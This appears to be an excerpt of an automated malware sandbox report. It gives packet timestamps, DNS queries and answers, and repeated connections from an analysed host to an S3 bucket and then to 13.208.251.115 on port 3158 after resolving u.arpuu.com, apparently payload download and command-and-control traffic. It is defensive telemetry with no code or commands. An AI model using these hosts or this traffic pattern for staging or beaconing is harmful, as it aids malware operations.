                                      Apr 2, 2025 16:23:09.965461969 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.965524912 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:09.965893030 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.965910912 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.965939045 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:09.965941906 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.965955019 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.965967894 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:09.965993881 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:09.966134071 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.966150045 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.966181993 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.966185093 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:09.966197014 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.966217041 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:09.966511965 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.966531038 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.966555119 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:09.966561079 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.966588020 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:09.966949940 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.966964960 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.967001915 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:09.967001915 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.967019081 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.967034101 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:09.967061043 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:09.968573093 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.968590975 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.968631029 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:09.968636990 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.968668938 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:09.968691111 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.975322008 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.975348949 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.975394011 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:09.975400925 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:09.975446939 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.030245066 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.299201965 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.299211979 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.299252033 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.299274921 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.299289942 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.299319029 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.299319029 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.299329996 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.299355030 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.299453020 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.299804926 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.299813986 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.299839973 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.299860954 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.299863100 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.299873114 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.299913883 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.299913883 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.299933910 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.300434113 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.300448895 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.300510883 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.300510883 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.300518990 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.300874949 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.300894976 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.300956964 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.300956964 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.300966024 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.301721096 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.301736116 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.301810026 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.301810026 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.301817894 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.302042007 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.302061081 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.302094936 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.302100897 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.302186966 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.302437067 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.302452087 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.302486897 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.302493095 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.302804947 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.302824974 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.302859068 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.302859068 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.302875996 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.302885056 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.302908897 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.302908897 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.303262949 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.303277016 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.303306103 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.303313017 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.303405046 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.303770065 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.303791046 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.303812027 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.303822994 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.303860903 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.304703951 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.304719925 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.304770947 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.304785967 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.305100918 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.305115938 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.305202961 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.305248976 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.305248976 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.305257082 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.305407047 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.305422068 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.305449963 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.305449963 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.305457115 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.305541039 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.305682898 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.305716038 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.305732012 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.305743933 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.305787086 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.305787086 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.306061029 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.306077957 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.306102991 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.306107998 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.306150913 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.306150913 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.306158066 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.306418896 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.306438923 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.306480885 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.306490898 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.306505919 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.306520939 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.306556940 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.306556940 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.306566954 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.306919098 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.306937933 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.306993961 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.306993961 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.307001114 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.307372093 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.307388067 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.307420015 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.307426929 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.307516098 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.308216095 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.308238029 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.308307886 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.308307886 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.308315992 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.308948994 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.308964968 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.309022903 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.309030056 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.315749884 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.315773010 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.315819979 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.315826893 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.315857887 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.315912008 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.315926075 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.315970898 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.315970898 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.315979958 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.358391047 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.635627031 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.635638952 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.635679007 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.635718107 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.635731936 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.635745049 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.635802984 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.635802984 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.636535883 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.636544943 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.636571884 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.636581898 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.636595011 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.636599064 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.636614084 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.636661053 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.636661053 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.974287033 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.974303007 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.974347115 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.974370003 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.974389076 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.974401951 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.974421978 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.974442959 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.974442959 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.974452019 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.974467993 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.974489927 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.974489927 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.974503040 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.974517107 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.974572897 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.974592924 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.974617958 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.974617958 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.974627018 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.974741936 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.974750042 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.974930048 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.976381063 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.976399899 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.976449966 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.976459026 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.976465940 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.976479053 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.976499081 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.976502895 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.976502895 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.976515055 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.976531029 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.976569891 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.976608992 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.976620913 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.976641893 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.976670027 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.976692915 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.976692915 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.976701021 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.976713896 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.976726055 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.976754904 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.976754904 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.976763964 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.976783037 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.976788044 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.976839066 CEST4434970852.219.132.99192.168.2.9
                                      Apr 2, 2025 16:23:10.976897001 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.976897001 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:10.977982044 CEST49708443192.168.2.952.219.132.99
                                      Apr 2, 2025 16:23:12.045496941 CEST497093158192.168.2.913.208.251.115
                                      Apr 2, 2025 16:23:12.321602106 CEST31584970913.208.251.115192.168.2.9
                                      Apr 2, 2025 16:23:12.322173119 CEST497093158192.168.2.913.208.251.115
                                      Apr 2, 2025 16:23:12.322619915 CEST497093158192.168.2.913.208.251.115
                                      Apr 2, 2025 16:23:12.599953890 CEST31584970913.208.251.115192.168.2.9
                                      Apr 2, 2025 16:23:12.655296087 CEST497093158192.168.2.913.208.251.115
                                      Apr 2, 2025 16:23:13.910967112 CEST497093158192.168.2.913.208.251.115
                                      Apr 2, 2025 16:23:22.492958069 CEST497113158192.168.2.913.208.251.115
                                      Apr 2, 2025 16:23:22.770651102 CEST31584971113.208.251.115192.168.2.9
                                      Apr 2, 2025 16:23:22.773478031 CEST497113158192.168.2.913.208.251.115
                                      Apr 2, 2025 16:23:22.779407024 CEST497113158192.168.2.913.208.251.115
                                      Apr 2, 2025 16:23:23.056953907 CEST31584971113.208.251.115192.168.2.9
                                      Apr 2, 2025 16:23:23.108422995 CEST497113158192.168.2.913.208.251.115
                                      Apr 2, 2025 16:23:24.762375116 CEST497113158192.168.2.913.208.251.115
                                      Apr 2, 2025 16:23:31.743978024 CEST497123158192.168.2.913.208.251.115
                                      Apr 2, 2025 16:23:32.020399094 CEST31584971213.208.251.115192.168.2.9
                                      Apr 2, 2025 16:23:32.024277925 CEST497123158192.168.2.913.208.251.115
                                      Apr 2, 2025 16:23:32.026266098 CEST497123158192.168.2.913.208.251.115
                                      Apr 2, 2025 16:23:32.302186012 CEST31584971213.208.251.115192.168.2.9
                                      Apr 2, 2025 16:23:32.342838049 CEST497123158192.168.2.913.208.251.115
                                      Apr 2, 2025 16:23:32.756603003 CEST497123158192.168.2.913.208.251.115
                                      TimestampSource PortDest PortSource IPDest IP
                                      Apr 2, 2025 16:22:28.952287912 CEST6407553192.168.2.91.1.1.1
                                      Apr 2, 2025 16:22:29.068609953 CEST53640751.1.1.1192.168.2.9
                                      Apr 2, 2025 16:22:33.800609112 CEST5571653192.168.2.91.1.1.1
                                      Apr 2, 2025 16:22:33.911998987 CEST53557161.1.1.1192.168.2.9
                                      Apr 2, 2025 16:22:40.176812887 CEST5108753192.168.2.91.1.1.1
                                      Apr 2, 2025 16:22:40.288744926 CEST53510871.1.1.1192.168.2.9
                                      Apr 2, 2025 16:22:57.867342949 CEST5864453192.168.2.91.1.1.1
                                      Apr 2, 2025 16:22:58.007942915 CEST53586441.1.1.1192.168.2.9
                                      Apr 2, 2025 16:23:02.370513916 CEST5782853192.168.2.91.1.1.1
                                      Apr 2, 2025 16:23:02.511467934 CEST53578281.1.1.1192.168.2.9
                                      Apr 2, 2025 16:23:07.102806091 CEST5866953192.168.2.91.1.1.1
                                      Apr 2, 2025 16:23:07.223876953 CEST53586691.1.1.1192.168.2.9
                                      Apr 2, 2025 16:23:11.879228115 CEST5805653192.168.2.91.1.1.1
                                      Apr 2, 2025 16:23:11.994951963 CEST53580561.1.1.1192.168.2.9
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Apr 2, 2025 16:22:28.952287912 CEST | 192.168.2.9 | 1.1.1.1 | 0x24e6 | Standard query (0) | imagesyd.s3.ap-southeast-1.amazonaws.com | A (IP address) | IN (0x0001) | false |
| Apr 2, 2025 16:22:33.800609112 CEST | 192.168.2.9 | 1.1.1.1 | 0x287b | Standard query (0) | imagesyd.s3.ap-southeast-1.amazonaws.com | A (IP address) | IN (0x0001) | false |
| Apr 2, 2025 16:22:40.176812887 CEST | 192.168.2.9 | 1.1.1.1 | 0x9b6d | Standard query (0) | imagesyd.s3.ap-southeast-1.amazonaws.com | A (IP address) | IN (0x0001) | false |
| Apr 2, 2025 16:22:57.867342949 CEST | 192.168.2.9 | 1.1.1.1 | 0xe627 | Standard query (0) | imagesyd.s3.ap-southeast-1.amazonaws.com | A (IP address) | IN (0x0001) | false |
| Apr 2, 2025 16:23:02.370513916 CEST | 192.168.2.9 | 1.1.1.1 | 0xc509 | Standard query (0) | imagesyd.s3.ap-southeast-1.amazonaws.com | A (IP address) | IN (0x0001) | false |
| Apr 2, 2025 16:23:07.102806091 CEST | 192.168.2.9 | 1.1.1.1 | 0x2c0b | Standard query (0) | imagesyd.s3.ap-southeast-1.amazonaws.com | A (IP address) | IN (0x0001) | false |
| Apr 2, 2025 16:23:11.879228115 CEST | 192.168.2.9 | 1.1.1.1 | 0x9b65 | Standard query (0) | u.arpuu.com | A (IP address) | IN (0x0001) | false |
                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                      Apr 2, 2025 16:22:29.068609953 CEST | 1.1.1.1 | 192.168.2.9 | 0x24e6 | No error (0) | imagesyd.s3.ap-southeast-1.amazonaws.com | s3-r-w.ap-southeast-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:29.068609953 CEST | 1.1.1.1 | 192.168.2.9 | 0x24e6 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.150.219 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:29.068609953 CEST | 1.1.1.1 | 192.168.2.9 | 0x24e6 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.148.142 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:29.068609953 CEST | 1.1.1.1 | 192.168.2.9 | 0x24e6 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.148.7 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:29.068609953 CEST | 1.1.1.1 | 192.168.2.9 | 0x24e6 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.146.244 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:29.068609953 CEST | 1.1.1.1 | 192.168.2.9 | 0x24e6 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.148.181 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:29.068609953 CEST | 1.1.1.1 | 192.168.2.9 | 0x24e6 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 52.219.132.187 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:29.068609953 CEST | 1.1.1.1 | 192.168.2.9 | 0x24e6 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.148.68 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:29.068609953 CEST | 1.1.1.1 | 192.168.2.9 | 0x24e6 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 52.219.124.79 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:33.911998987 CEST | 1.1.1.1 | 192.168.2.9 | 0x287b | No error (0) | imagesyd.s3.ap-southeast-1.amazonaws.com | s3-r-w.ap-southeast-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:33.911998987 CEST | 1.1.1.1 | 192.168.2.9 | 0x287b | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 52.219.129.35 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:33.911998987 CEST | 1.1.1.1 | 192.168.2.9 | 0x287b | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.148.215 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:33.911998987 CEST | 1.1.1.1 | 192.168.2.9 | 0x287b | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.146.138 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:33.911998987 CEST | 1.1.1.1 | 192.168.2.9 | 0x287b | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.149.140 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:33.911998987 CEST | 1.1.1.1 | 192.168.2.9 | 0x287b | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.149.104 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:33.911998987 CEST | 1.1.1.1 | 192.168.2.9 | 0x287b | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.150.35 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:33.911998987 CEST | 1.1.1.1 | 192.168.2.9 | 0x287b | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 52.219.124.111 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:33.911998987 CEST | 1.1.1.1 | 192.168.2.9 | 0x287b | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.149.132 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:40.288744926 CEST | 1.1.1.1 | 192.168.2.9 | 0x9b6d | No error (0) | imagesyd.s3.ap-southeast-1.amazonaws.com | s3-r-w.ap-southeast-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
